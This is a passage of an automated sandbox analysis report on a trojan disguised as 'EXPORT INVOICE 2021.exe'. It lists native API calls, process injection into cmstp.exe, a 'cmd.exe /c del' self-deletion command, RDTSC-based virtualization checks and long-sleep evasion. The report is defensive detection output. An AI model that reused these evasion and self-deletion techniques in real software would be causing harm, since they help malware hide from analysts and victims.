          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041C3832_2_0041C383
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00408C3A2_2_00408C3A
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00408C802_2_00408C80
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00402D892_2_00402D89
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041CFD22_2_0041CFD2
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B0908_2_0488B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_049310028_2_04931002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488841F8_2_0488841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488D5E08_2_0488D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487F9008_2_0487F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04870D208_2_04870D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048941208_2_04894120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04941D558_2_04941D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04896E308_2_04896E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AEBB08_2_048AEBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4CBC58_2_02D4CBC5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4C3838_2_02D4C383
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B8C68_2_02D4B8C6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D32FB08_2_02D32FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D38C808_2_02D38C80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D38C3A8_2_02D38C3A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D32D908_2_02D32D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D32D898_2_02D32D89
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0487B150 appears 32 times
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004185E0 NtCreateFile,2_2_004185E0
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00418690 NtReadFile,2_2_00418690
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00418710 NtClose,2_2_00418710
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004187C0 NtAllocateVirtualMemory,2_2_004187C0
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041868A NtReadFile,2_2_0041868A
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041870A NtClose,2_2_0041870A
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004187BB NtAllocateVirtualMemory,2_2_004187BB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9840 NtDelayExecution,LdrInitializeThunk,8_2_048B9840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9860 NtQuerySystemInformation,LdrInitializeThunk,8_2_048B9860
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B99A0 NtCreateSection,LdrInitializeThunk,8_2_048B99A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B95D0 NtClose,LdrInitializeThunk,8_2_048B95D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_048B9910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9540 NtReadFile,LdrInitializeThunk,8_2_048B9540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B96D0 NtCreateKey,LdrInitializeThunk,8_2_048B96D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B96E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_048B96E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A50 NtCreateFile,LdrInitializeThunk,8_2_048B9A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9650 NtQueryValueKey,LdrInitializeThunk,8_2_048B9650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_048B9660
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9780 NtMapViewOfSection,LdrInitializeThunk,8_2_048B9780
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9FE0 NtCreateMutant,LdrInitializeThunk,8_2_048B9FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9710 NtQueryInformationToken,LdrInitializeThunk,8_2_048B9710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B98A0 NtWriteVirtualMemory,8_2_048B98A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B98F0 NtReadVirtualMemory,8_2_048B98F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9820 NtEnumerateKey,8_2_048B9820
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BB040 NtSuspendThread,8_2_048BB040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B99D0 NtCreateProcessEx,8_2_048B99D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B95F0 NtQueryInformationFile,8_2_048B95F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9520 NtWaitForSingleObject,8_2_048B9520
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BAD30 NtSetContextThread,8_2_048BAD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9950 NtQueueApcThread,8_2_048B9950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9560 NtWriteFile,8_2_048B9560
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A80 NtOpenDirectoryObject,8_2_048B9A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A00 NtProtectVirtualMemory,8_2_048B9A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A10 NtQuerySection,8_2_048B9A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9610 NtEnumerateValueKey,8_2_048B9610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A20 NtResumeThread,8_2_048B9A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9670 NtQueryInformationProcess,8_2_048B9670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B97A0 NtUnmapViewOfSection,8_2_048B97A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BA3B0 NtGetContextThread,8_2_048BA3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9B00 NtSetValueKey,8_2_048B9B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BA710 NtOpenProcessToken,8_2_048BA710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9730 NtQueryVirtualMemory,8_2_048B9730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9760 NtOpenProcess,8_2_048B9760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9770 NtSetInformationFile,8_2_048B9770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BA770 NtOpenThread,8_2_048BA770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D48690 NtReadFile,8_2_02D48690
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D487C0 NtAllocateVirtualMemory,8_2_02D487C0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D48710 NtClose,8_2_02D48710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D485E0 NtCreateFile,8_2_02D485E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4868A NtReadFile,8_2_02D4868A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D487BB NtAllocateVirtualMemory,8_2_02D487BB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4870A NtClose,8_2_02D4870A
          Source: EXPORT INVOICE 2021.exe, 00000000.00000000.671752764.0000000000A00000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.797551448.0000000000B60000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.799092420.00000000017DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exeBinary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exeVirustotal: Detection: 32%
          Source: EXPORT INVOICE 2021.exeMetadefender: Detection: 17%
          Source: EXPORT INVOICE 2021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'Jump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EXPORT INVOICE 2021.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@10/2
          Source: EXPORT INVOICE 2021.exe, 00000000.00000000.671512016.0000000000932000.00000002.00020000.sdmp, EXPORT INVOICE 2021.exe, 00000002.00000002.797206646.0000000000A92000.00000002.00020000.sdmpBinary or memory string: INSERT INTO RolPermiso(RolPermiso_rol, RolPermiso_permiso) VALUES (;Error - Nuevo - RolPermisoDAL
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: EXPORT INVOICE 2021.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: EXPORT INVOICE 2021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe, 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B822 push eax; ret 2_2_0041B828
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B82B push eax; ret 2_2_0041B892
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B88C push eax; ret 2_2_0041B892
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00418AC1 push cs; retf 2_2_00418AC4
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00415AE6 push ecx; ret 2_2_00415B1F
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00415AF0 push ecx; ret 2_2_00415B1F
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004152B2 push eax; retf 2_2_004152B3
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0040861B push edi; iretd 2_2_0040861C
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041CE9A push FFFFFFE5h; retf 2_2_0041CE9F
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B7D5 push eax; ret 2_2_0041B828
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00A97A1F push esi; iretd 2_2_00A97A2E
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00A94459 push cs; retf 2_2_00A9445C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048CD0D1 push ecx; ret 8_2_048CD0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D48AC1 push cs; retf 8_2_02D48AC4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D45AF0 push ecx; ret 8_2_02D45B1F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D45AE6 push ecx; ret 8_2_02D45B1F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D452B2 push eax; retf 8_2_02D452B3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B88C push eax; ret 8_2_02D4B892
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B822 push eax; ret 8_2_02D4B828
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B82B push eax; ret 8_2_02D4B892
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4D1CA pushfd ; iretd 8_2_02D4D1CB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4CE9A push FFFFFFE5h; retf 8_2_02D4CE9F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4BE49 push edi; iretd 8_2_02D4BE4A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4BE75 push ebx; iretd 8_2_02D4BE76
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D3861B push edi; iretd 8_2_02D3861C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B7D5 push eax; ret 8_2_02D4B828
          Source: initial sampleStatic PE information: section name: .text entropy: 7.07298793214

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'Jump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002D38604 second address: 0000000002D3860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002D3899E second address: 0000000002D389A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe TID: 6708Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004088D0 rdtsc 2_2_004088D0
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000000.743466087.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.739552326.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.743466087.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.743692325.000000000A716000.00000004.00000001.sdmpBinary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.736762882.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004088D0 rdtsc 2_2_004088D0
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879080 mov eax, dword ptr fs:[00000030h]8_2_04879080
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F3884 mov eax, dword ptr fs:[00000030h]8_2_048F3884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F3884 mov eax, dword ptr fs:[00000030h]8_2_048F3884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488849B mov eax, dword ptr fs:[00000030h]8_2_0488849B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B90AF mov eax, dword ptr fs:[00000030h]8_2_048B90AF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AF0BF mov ecx, dword ptr fs:[00000030h]8_2_048AF0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AF0BF mov eax, dword ptr fs:[00000030h]8_2_048AF0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AF0BF mov eax, dword ptr fs:[00000030h]8_2_048AF0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov eax, dword ptr fs:[00000030h]8_2_0490B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov ecx, dword ptr fs:[00000030h]8_2_0490B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov eax, dword ptr fs:[00000030h]8_2_0490B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov eax, dword ptr fs:[00000030h]8_2_0490B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov eax, dword ptr fs:[00000030h]8_2_0490B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490B8D0 mov eax, dword ptr fs:[00000030h]8_2_0490B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948CD6 mov eax, dword ptr fs:[00000030h]8_2_04948CD6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_049314FB mov eax, dword ptr fs:[00000030h]8_2_049314FB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6CF0 mov eax, dword ptr fs:[00000030h]8_2_048F6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6CF0 mov eax, dword ptr fs:[00000030h]8_2_048F6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6CF0 mov eax, dword ptr fs:[00000030h]8_2_048F6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04944015 mov eax, dword ptr fs:[00000030h]8_2_04944015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04944015 mov eax, dword ptr fs:[00000030h]8_2_04944015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6C0A mov eax, dword ptr fs:[00000030h]8_2_048F6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6C0A mov eax, dword ptr fs:[00000030h]8_2_048F6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6C0A mov eax, dword ptr fs:[00000030h]8_2_048F6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F6C0A mov eax, dword ptr fs:[00000030h]8_2_048F6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
